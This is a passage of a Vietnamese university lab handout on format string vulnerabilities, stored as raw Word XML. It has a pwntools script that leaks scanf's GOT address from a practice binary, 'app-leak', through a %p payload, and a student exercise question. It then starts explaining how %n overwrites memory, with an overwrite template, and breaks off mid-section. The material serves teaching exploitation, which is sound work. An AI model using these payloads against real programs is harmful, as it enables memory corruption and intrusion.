            <w:tcW w:w="421" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38572FAD"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6728DB51"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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23385D8E"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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE8D0D1"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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23153980"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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5B902EE2"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6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CB99690"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7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F91219F"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8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="320B1AF0"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9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E490D89"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0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CBC35D0"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1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4472F3A6"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2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C24A050"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3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BACC617"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4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FFD5A6E" w14:textId="77777777" w:rsidR="00D04F54" w:rsidRP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5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3075DDC6" w14:textId="77777777" w:rsidR="00D04F54" w:rsidRDefault="00D04F54" w:rsidP="00D04F54">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D04F54">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E6EBEF7" w14:textId="3BAC9D25" w:rsidR="00445C2A" w:rsidRPr="0055088D" w:rsidRDefault="00445C2A" w:rsidP="00D04F54">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23A181E0" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="060045E5" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sh = process('./app-leak')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="53861BA9" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>leakmemory = ELF('./app-leak')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AE00872" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># address of scanf entry in GOT, where we need to read content</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FB0E663" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>__isoc99_scanf_got = leakmemory.got['__isoc99_scanf']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2083502A" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>print ("- GOT of scanf: %s" % hex(__isoc99_scanf_got))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68A719D2" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># prepare format string to exploit</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D9680D3" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># change to your format string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41D9224D" w14:textId="5E8D0713" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>fm_str = b'</w:t>
            </w:r>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>%p%p%p</w:t>
            </w:r>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4205C35B" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>payload = p32(__isoc99_scanf_got) + fm_str</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72245CA9" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>print ("- Your payload: %s"% payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7803C118" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># send format string</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43139FBE" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sh.sendline(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62E416C3" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sh.recvuntil(fm_str+b'\n')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="634A0F67" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00445C2A" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:color w:val="A6A6A6" w:themeColor="background1" w:themeShade="A6"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># remove the first bytes of __isoc99_scanf@got</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B3DD715" w14:textId="77777777" w:rsidR="00445C2A" w:rsidRPr="00D776B6" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D776B6">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">print ('- Address of scanf: %s'% hex(u32(sh.recv()[4:8]))) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40B203B3" w14:textId="7E711359" w:rsidR="00D04F54" w:rsidRPr="00D04F54" w:rsidRDefault="00445C2A" w:rsidP="00445C2A">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00445C2A">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sh.interactive()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="074DF749" w14:textId="26D50D4A" w:rsidR="005F737D" w:rsidRDefault="00D04F54" w:rsidP="00D04F54">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả chạy đoạn mã khai thác là địa chỉ của scanf trên hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E57BEA6" w14:textId="2C9F2B68" w:rsidR="007B6FBD" w:rsidRDefault="003A0BFA" w:rsidP="007B6FBD">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71510C25" wp14:editId="7C04E66A">
            <wp:extent cx="4026269" cy="20241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2434" cy="2042289"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="229ED645" w14:textId="2D8ABBEA" w:rsidR="00D04F54" w:rsidRPr="00D04F54" w:rsidRDefault="00D04F54" w:rsidP="00D04F54">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04F54">
        <w:rPr>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Sinh viên giải thích ý nghĩa dòng code 16 để lấy địa chỉ của scanf từ GOT?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE8B005" w14:textId="479175E7" w:rsidR="00BD185F" w:rsidRPr="00BD185F" w:rsidRDefault="00D04F54" w:rsidP="00BD185F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Khai thác lỗ hổng format string để g</w:t>
      </w:r>
      <w:r w:rsidR="00BD185F" w:rsidRPr="00BD185F">
        <w:t>hi đè bộ nhớ</w:t>
      </w:r>
      <w:r w:rsidR="00BD185F" w:rsidRPr="00BD185F">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA3E02" w14:textId="731CA775" w:rsidR="00DC2FBD" w:rsidRDefault="00DC2FBD" w:rsidP="00DC2FBD">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ở trên, ta đã chỉ ra cách sử dụng chuỗi định dạng để </w:t>
      </w:r>
      <w:r w:rsidR="00D04F54">
        <w:t>đọc dữ liệu từ stack</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidR="00D04F54">
        <w:t xml:space="preserve">từ </w:t>
      </w:r>
      <w:r>
        <w:t>các địa chỉ tùy ý</w:t>
      </w:r>
      <w:r w:rsidR="00D04F54">
        <w:t>. Ở phần này, ta sẽ khai thác lỗ hổng format string để truyền các chuỗi định dạng có khả năng ghi đè giá trị trên các vùng nhớ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D513A00" w14:textId="2EC30D4C" w:rsidR="00D04F54" w:rsidRDefault="00D04F54" w:rsidP="00D04F54">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Giới thiệu format %n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0307C946" w14:textId="5D477137" w:rsidR="00E10425" w:rsidRPr="00D04F54" w:rsidRDefault="00D04F54" w:rsidP="00D04F54">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r w:rsidRPr="00876503">
        <w:t>%n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> không in ra dữ liệu gì, mặ</w:t>
      </w:r>
      <w:r w:rsidR="00A236B1">
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> khác nó nắm giữ </w:t>
      </w:r>
      <w:r w:rsidRPr="00876503">
        <w:t xml:space="preserve">số ký tự đã được xuất thành công </w:t>
      </w:r>
      <w:r>
        <w:t>trước đó và lưu vào vùng nhớ được chỉ định trong tham số là 1 con</w:t>
      </w:r>
      <w:r w:rsidRPr="00876503">
        <w:t xml:space="preserve"> trỏ.</w:t>
      </w:r>
      <w:r w:rsidR="00B00B54">
        <w:t xml:space="preserve"> Do cách hoạt động của %n luôn cần 1 địa chỉ làm tham số, do đó khi muốn ghi đè bắt buộc phải biết địa chỉ của vị trí cần ghi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBE469E" w14:textId="30E09EBE" w:rsidR="00D735C6" w:rsidRDefault="004312D5" w:rsidP="00BB37B4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Về cơ bản, dạng chuỗi định dạng dùng để ghi đè giá trị sẽ có dạng như sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34369F17" w14:textId="735A75C4" w:rsidR="004312D5" w:rsidRPr="00581899" w:rsidRDefault="004312D5" w:rsidP="004312D5">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00581899">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[overwrite addr]</w:t>
      </w:r>
      <w:r w:rsidR="0074479B" w:rsidRPr="00581899">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[additional format]%</w:t>
      </w:r>
      <w:r w:rsidRPr="00581899">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>[overwrite offset]$n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2661217E" w14:textId="77777777" w:rsidR="004312D5" w:rsidRDefault="00286309" w:rsidP="00D73629">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00144727" w:rsidRPr="00D73629">
        <w:t>rong số đó</w:t>
      </w:r>
      <w:r w:rsidR="004312D5">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C18058" w14:textId="4BF96427" w:rsidR="004312D5" w:rsidRDefault="00D73629" w:rsidP="004312D5">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="228"/>
      </w:pPr>
      <w:r w:rsidRPr="004312D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>overwrite addr</w:t>
      </w:r>
      <w:r w:rsidR="00FF1B89">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004312D5">
        <w:t>là</w:t>
      </w:r>
      <w:r w:rsidR="00144727" w:rsidRPr="00D73629">
        <w:t xml:space="preserve"> địa chỉ ta muốn ghi đè</w:t>
      </w:r>
      <w:r w:rsidR="008410B6">
        <w:t>, viết dưới dạng Little endian.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656E254D" w14:textId="608F8D5A" w:rsidR="00323158" w:rsidRDefault="00323158" w:rsidP="004312D5">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="228"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>additional format</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là ký hiệu format được thêm để đảm bảo giá trị được %n ghi vào </w:t>
      </w:r>
      <w:r w:rsidRPr="004312D5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>overwrite addr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là giá trị mong muốn. Ta có tổng kích thước </w:t>
      </w:r>
      <w:r w:rsidR="00C5644D">
        <w:t>dữ liệu được in ra với</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> overwrite addr và additional format là giá trị cần ghi đè.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F5507C" w14:textId="6F08CDD2" w:rsidR="004312D5" w:rsidRDefault="004312D5" w:rsidP="004312D5">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="228"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">overwrite offset </w:t>
      </w:r>
      <w:r>
        <w:t>là thứ tự tham số của vị trí lưu overwrite addr so với vùng tham số của hàm in (ví dụ printf)</w:t>
      </w:r>
      <w:r w:rsidR="00BB5C34">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00CD0B8A">
        <w:t xml:space="preserve"> để đảm bảo %n được </w:t>
      </w:r>
      <w:r w:rsidR="00BB5C34">
        <w:t>dùng với</w:t>
      </w:r>
      <w:r w:rsidR="00CD0B8A">
        <w:t xml:space="preserve"> overwrite addr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CFE5482" w14:textId="2B260177" w:rsidR="004312D5" w:rsidRDefault="004312D5" w:rsidP="004312D5">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="228"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r>
        <w:t>là kí hiệu để ghi dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC834B0" w14:textId="757C8D96" w:rsidR="00144727" w:rsidRDefault="00323158" w:rsidP="00837271">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Từ</w:t>
      </w:r>
      <w:r w:rsidR="00837271">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D00AE6">
        <w:t xml:space="preserve">định </w:t>
      </w:r>
      <w:r w:rsidR="00837271">
        <w:t xml:space="preserve">dạng trên, ta thấy có </w:t>
      </w:r>
      <w:r w:rsidR="008810EF">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00837271">
        <w:t xml:space="preserve"> thông tin cần xác định khi khai thác là </w:t>
      </w:r>
      <w:r w:rsidR="00837271" w:rsidRPr="00837271">
        <w:t>overwrite addr</w:t>
      </w:r>
      <w:r w:rsidR="008810EF">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00837271">
        <w:t xml:space="preserve"> overwrite offset</w:t>
      </w:r>
      <w:r w:rsidR="008810EF">
        <w:t xml:space="preserve"> và additional format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F51D39" w14:textId="742898D3" w:rsidR="00FC3418" w:rsidRDefault="00FC3418" w:rsidP="00FC3418">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00153D16">
        <w:t xml:space="preserve">hần này khai thác file thực thi </w:t>
      </w:r>
      <w:r w:rsidR="00153D16" w:rsidRPr="00153D16">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>app-overwrite</w:t>
      </w:r>
      <w:r w:rsidR="00A818B6">
        <w:t xml:space="preserve"> với </w:t>
      </w:r>
      <w:r w:rsidR="00153D16">
        <w:t>mã nguồn bên dưới</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, trong đó: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079B8F49" w14:textId="21254FEA" w:rsidR="00FC3418" w:rsidRDefault="00FC3418" w:rsidP="00FC3418">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">File thực thi </w:t>
      </w:r>
      <w:r w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>32 bit</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D4890E" w14:textId="77777777" w:rsidR="00FC3418" w:rsidRDefault="00FC3418" w:rsidP="00FC3418">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> là biến cục bộ, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A46AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
